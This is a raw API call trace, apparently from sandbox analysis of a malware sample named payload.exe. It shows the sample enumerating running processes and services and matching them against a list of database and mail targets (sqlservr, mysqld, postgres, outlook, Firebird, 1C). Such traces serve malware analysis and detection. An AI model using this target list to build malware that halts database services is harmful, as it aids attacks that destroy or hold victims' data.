[0272.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0272.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0272.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0272.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0272.716] lstrlenW (lpString="UxSms") returned 5 [0272.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0272.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0272.716] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0272.716] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0272.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0272.716] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0272.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4 [0272.717] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.717] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.717] lstrlenW (lpString="System") returned 6 [0272.717] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0272.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0272.717] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0272.717] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0272.717] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0272.717] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0272.717] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0272.717] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.718] lstrlenW (lpString="smss.exe") returned 8 [0272.718] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0272.718] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.718] lstrlenW (lpString="csrss.exe") returned 9 [0272.718] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.718] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.718] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.718] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.719] lstrlenW (lpString="wininit.exe") returned 11 [0272.719] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0272.719] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0272.719] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0272.719] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0272.719] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0272.719] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0272.719] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0272.719] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.719] lstrlenW (lpString="csrss.exe") returned 9 [0272.719] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.719] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.719] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.719] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.719] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.719] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.719] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.719] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.720] lstrlenW (lpString="winlogon.exe") returned 12 [0272.720] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0272.720] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0272.720] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0272.720] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0272.720] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0272.720] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0272.720] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0272.720] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.720] lstrlenW (lpString="services.exe") returned 12 [0272.720] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0272.720] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0272.720] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0272.720] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0272.720] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0272.720] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0272.720] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0272.720] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.721] lstrlenW (lpString="lsass.exe") returned 9 [0272.721] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0272.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0272.721] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0272.721] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0272.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0272.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0272.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0272.721] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0272.721] lstrlenW (lpString="lsm.exe") returned 7 [0272.721] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0272.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0272.721] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0272.721] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0272.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0272.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0272.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0272.721] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.722] lstrlenW (lpString="svchost.exe") returned 11 [0272.722] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.722] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.722] lstrlenW (lpString="svchost.exe") returned 11 [0272.722] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.722] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.722] lstrlenW (lpString="svchost.exe") returned 11 [0272.723] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.723] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.723] lstrlenW (lpString="svchost.exe") returned 11 [0272.723] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.723] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.723] lstrlenW (lpString="svchost.exe") returned 11 [0272.723] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.724] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.724] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.724] lstrlenW (lpString="audiodg.exe") returned 11 [0272.724] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.724] lstrlenW (lpString="svchost.exe") returned 11 [0272.724] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.724] lstrlenW (lpString="svchost.exe") returned 11 [0272.724] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0272.725] lstrlenW (lpString="userinit.exe") returned 12 [0272.725] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.725] lstrlenW (lpString="dwm.exe") returned 7 [0272.725] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.725] lstrlenW (lpString="explorer.exe") returned 12 [0272.725] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.725] lstrlenW (lpString="spoolsv.exe") returned 11 [0272.725] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0272.726] lstrlenW (lpString="taskhost.exe") returned 12 [0272.726] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.726] lstrlenW (lpString="svchost.exe") returned 11 [0272.726] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0272.726] lstrlenW (lpString="payload.exe") returned 11 [0272.726] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0272.726] lstrlenW (lpString="dllhost.exe") returned 11 [0272.726] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0272.727] lstrlenW (lpString="reader_sl.exe") returned 13 [0272.727] Process32NextW (in: hSnapshot=0x3a4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0272.727] CloseHandle (hObject=0x3a4) returned 1 [0272.727] Sleep (dwMilliseconds=0x1f4) [0273.253] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c0ae8 [0273.489] EnumServicesStatusExW (in: hSCManager=0x43c0ae8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0273.489] GetLastError () returned 0xea [0273.489] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0273.489] EnumServicesStatusExW (in: hSCManager=0x43c0ae8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0273.489] CloseServiceHandle (hSCObject=0x43c0ae8) returned 1 [0273.490] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0273.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.490] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0273.490] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0273.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0273.490] lstrlenW (lpString="AudioSrv") returned 8 [0273.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0273.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0273.490] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0273.490] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0273.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0273.490] lstrlenW (lpString="BFE") returned 3 [0273.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0273.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0273.490] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0273.490] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0273.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0273.490] lstrlenW (lpString="CryptSvc") returned 8 [0273.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0273.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0273.490] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0273.490] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0273.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0273.490] lstrlenW (lpString="CscService") returned 10 [0273.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0273.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0273.491] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0273.491] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0273.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0273.491] lstrlenW (lpString="DcomLaunch") returned 10 [0273.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.491] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0273.491] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0273.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0273.491] lstrlenW (lpString="Dhcp") returned 4 [0273.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0273.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0273.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0273.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0273.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0273.491] lstrlenW (lpString="Dnscache") returned 8 [0273.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0273.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0273.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0273.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0273.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0273.491] lstrlenW (lpString="DPS") returned 3 [0273.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0273.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0273.491] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0273.491] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0273.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0273.491] lstrlenW (lpString="eventlog") returned 8 [0273.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0273.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0273.491] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0273.492] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0273.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0273.492] lstrlenW (lpString="EventSystem") returned 11 [0273.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0273.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0273.492] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0273.492] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0273.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0273.492] lstrlenW (lpString="gpsvc") returned 5 [0273.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0273.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0273.492] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0273.492] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0273.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0273.492] lstrlenW (lpString="LanmanWorkstation") returned 17 [0273.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.492] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0273.492] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0273.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0273.492] lstrlenW (lpString="lmhosts") returned 7 [0273.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0273.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0273.492] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0273.492] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0273.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0273.492] lstrlenW (lpString="MMCSS") returned 5 [0273.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 